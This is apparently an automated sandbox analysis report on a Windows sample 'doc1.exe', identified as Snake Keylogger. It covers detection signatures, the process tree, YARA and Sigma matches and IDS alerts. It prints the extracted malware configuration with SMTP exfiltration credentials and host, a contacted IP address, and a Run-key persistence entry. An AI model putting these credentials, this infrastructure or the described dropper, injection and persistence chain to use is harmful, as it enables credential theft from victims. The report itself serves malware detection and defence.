Windows Analysis Report
doc1.exe

Overview

General Information

Sample name:doc1.exe
Analysis ID:1500036
MD5:fddd99d918c32a807cd1761c519b086b
SHA1:8cf7e4c454f20d2ab851bb6e18a4250b7af4157c
SHA256:5cd8e28712872382cacac0d338a4d041e291b89d41a4daf69eabefe7ec46f920
Tags:exe, SnakeKeylogger

Detection

Clipboard Hijacker, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected Clipboard Hijacker
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • doc1.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\doc1.exe" MD5: FDDD99D918C32A807CD1761C519B086B)
    • wscript.exe (PID: 6504 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
    • InstallUtil.exe (PID: 5392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6840 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3508 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 4896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 4884 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 3576 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3508" "2808" "2740" "2812" "0" "0" "2816" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 2188 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 400 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 2744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 2420 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2188" "2800" "2756" "2804" "0" "0" "2808" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 6756 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 6452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 2744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 2888 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 2548 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 5984 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 6716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 4632 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 2744 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • MSBuild.exe (PID: 2420 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
        • WerFault.exe (PID: 4160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 1064 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • wermgr.exe (PID: 2496 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
    • powershell.exe (PID: 4568 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1300 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • bosotkm.exe (PID: 1864 cmdline: "C:\Users\user\AppData\Roaming\bosotkm.exe" MD5: FDDD99D918C32A807CD1761C519B086B)
    • InstallUtil.exe (PID: 948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • bosotkm.exe (PID: 1292 cmdline: "C:\Users\user\AppData\Roaming\bosotkm.exe" MD5: FDDD99D918C32A807CD1761C519B086B)
    • InstallUtil.exe (PID: 1596 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • rundll32.exe (PID: 3640 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • svchost.exe (PID: 352 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "sendxbacklog@zulpine.shop", "Password": "dkA6kDAnLHNg", "Host": "zulpine.shop", "Port": "587", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x18aed:$a1: get_encryptedPassword
  • 0x18dd9:$a2: get_encryptedUsername
  • 0x188f9:$a3: get_timePasswordChanged
  • 0x189f4:$a4: get_passwordField
  • 0x18b03:$a5: set_encryptedPassword
  • 0x1a13f:$a7: get_logins
  • 0x1a0a2:$a10: KeyLoggerEventArgs
  • 0x19d0d:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x1c464:$x1: $%SMTPDV$
  • 0x1c4ca:$x2: $#TheHashHere%&
  • 0x1daf3:$x3: %FTPDV$
  • 0x1dbe7:$x4: $%TelegramDv$
  • 0x19d0d:$x5: KeyLoggerEventArgs
  • 0x1a0a2:$x5: KeyLoggerEventArgs
  • 0x1db17:$m2: Clipboard Logs ID
  • 0x1dd37:$m2: Screenshot Logs ID
  • 0x1de47:$m2: keystroke Logs ID
  • 0x1e121:$m3: SnakePW
  • 0x1dd0f:$m4: \SnakeKeylogger\
00000001.00000002.2301644426.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
21.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
1.2.doc1.exe.56f0000.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
12.2.MSBuild.exe.9d0000.0.unpack | JoeSecurity_Clipboard_Hijacker_1 | Yara detected Clipboard Hijacker | Joe Security
1.2.doc1.exe.3c2d068.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
1.2.doc1.exe.3c2d068.4.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
                  Source | Rule | Description | Author | Strings
                  amsi64_3508.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_2188.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_6756.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_2548.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=
                  amsi64_2744.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                  • 0xc137:$b2: ::FromBase64String(
                  • 0xbda3:$s1: -join
                  • 0xc14b:$s1: -join
                  • 0x554f:$s4: +=
                  • 0x5611:$s4: +=
                  • 0x9838:$s4: +=
                  • 0xb955:$s4: +=
                  • 0xbc3f:$s4: +=
                  • 0xbd85:$s4: +=
                  • 0xe338:$s4: +=
                  • 0xe3b8:$s4: +=
                  • 0xe47e:$s4: +=
                  • 0xe4fe:$s4: +=
                  • 0xe6d4:$s4: +=
                  • 0xe758:$s4: +=
                  • 0xff6e:$s4: +=
                  • 0xffee:$s4: +=
                  • 0x100b4:$s4: +=
                  • 0x10134:$s4: +=
                  • 0x1030a:$s4: +=
                  • 0x1038e:$s4: +=

                  System Summary

                  Source: Threat created, Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, SourceProcessId: 2420, StartAddress: 7311B510, TargetImage: C:\Windows\System32\wermgr.exe, TargetProcessId: 2420
                  Source: Network Connection, Author: frack113, Florian Roth: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6504, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49715
                  Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Source: Process started, Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Source: File created, Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 6504, TargetFilename: C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs
                  Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\bosotkm.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\doc1.exe, ProcessId: 6400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bosotkm
                  Source: Network Connection, Author: frack113: Data: DestinationIp: 144.91.79.54, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6504, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49715
                  Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\doc1.exe", ParentImage: C:\Users\user\Desktop\doc1.exe, ParentProcessId: 6400, ParentProcessName: doc1.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msb.vbe" , ProcessId: 6504, ProcessName: wscript.exe
                  Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\fNUATsLGslepRpn.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6840, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" , ProcessId: 3508, ProcessName: powershell.exe
                  Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 352, ProcessName: svchost.exe
                  Timestamp:2024-08-27T20:03:17.501424+0200
                  SID:2803274
                  Severity:2
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:48.769226+0200
                  SID:2803305
                  Severity:3
                  Source Port:49760
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:50.512395+0200
                  SID:2803305
                  Severity:3
                  Source Port:49764
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:39.720201+0200
                  SID:2803274
                  Severity:2
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:48.682864+0200
                  SID:2803305
                  Severity:3
                  Source Port:49759
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:53.734932+0200
                  SID:2803305
                  Severity:3
                  Source Port:49768
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:21.704538+0200
                  SID:2803274
                  Severity:2
                  Source Port:49723
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:41.556919+0200
                  SID:2803305
                  Severity:3
                  Source Port:49747
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:40.339749+0200
                  SID:2803305
                  Severity:3
                  Source Port:49745
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:57.238554+0200
                  SID:2803305
                  Severity:3
                  Source Port:49774
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:48.079577+0200
                  SID:2803274
                  Severity:2
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:20.034815+0200
                  SID:2803274
                  Severity:2
                  Source Port:49716
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:49.884414+0200
                  SID:2803274
                  Severity:2
                  Source Port:49761
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:40.985840+0200
                  SID:2803274
                  Severity:2
                  Source Port:49746
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:51.727380+0200
                  SID:2803305
                  Severity:3
                  Source Port:49766
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:24.314221+0200
                  SID:2803305
                  Severity:3
                  Source Port:49728
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:42.776244+0200
                  SID:2803305
                  Severity:3
                  Source Port:49751
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:42.188993+0200
                  SID:2803274
                  Severity:2
                  Source Port:49750
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:50.431489+0200
                  SID:2803305
                  Severity:3
                  Source Port:49763
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:46.876469+0200
                  SID:2803274
                  Severity:2
                  Source Port:49756
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:23.563943+0200
                  SID:2803274
                  Severity:2
                  Source Port:49727
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-27T20:03:46.548131+0200
                  SID:2803305
                  Severity:3
                  Source Port:49755
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:20.617307+0200
                  SID:2803305
                  Severity:3
                  Source Port:49721
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:22.289776+0200
                  SID:2803305
                  Severity:3
                  Source Port:49725
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:29.195692+0200
                  SID:2803305
                  Severity:3
                  Source Port:49736
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-27T20:03:38.688943+0200
                  SID:2803274
                  Severity:2
                  Source Port:49742
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic

                  AV Detection

                  Source: 00000001.00000002.2301644426.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sendxbacklog@zulpine.shop", "Password": "dkA6kDAnLHNg", "Host": "zulpine.shop", "Port": "587", "Version": "5.1"}
                  Source: C:\Users\user\AppData\Roaming\bosotkm.exe, ReversingLabs: Detection: 52%
                  Source: doc1.exe, ReversingLabs: Detection: 52%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: doc1.exe, Joe Sandbox ML: detected

                  Location Tracking

                  Source: unknown, DNS query: name: reallyfreegeoip.org
                  Source: doc1.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49717 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49726 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49743 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49758 version: TLS 1.0
                  Source: unknown, HTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49735 version: TLS 1.2
                  Source: unknown, HTTPS traffic detected: 20.190.159.73:443 -> 192.168.2.6:49738 version: TLS 1.2
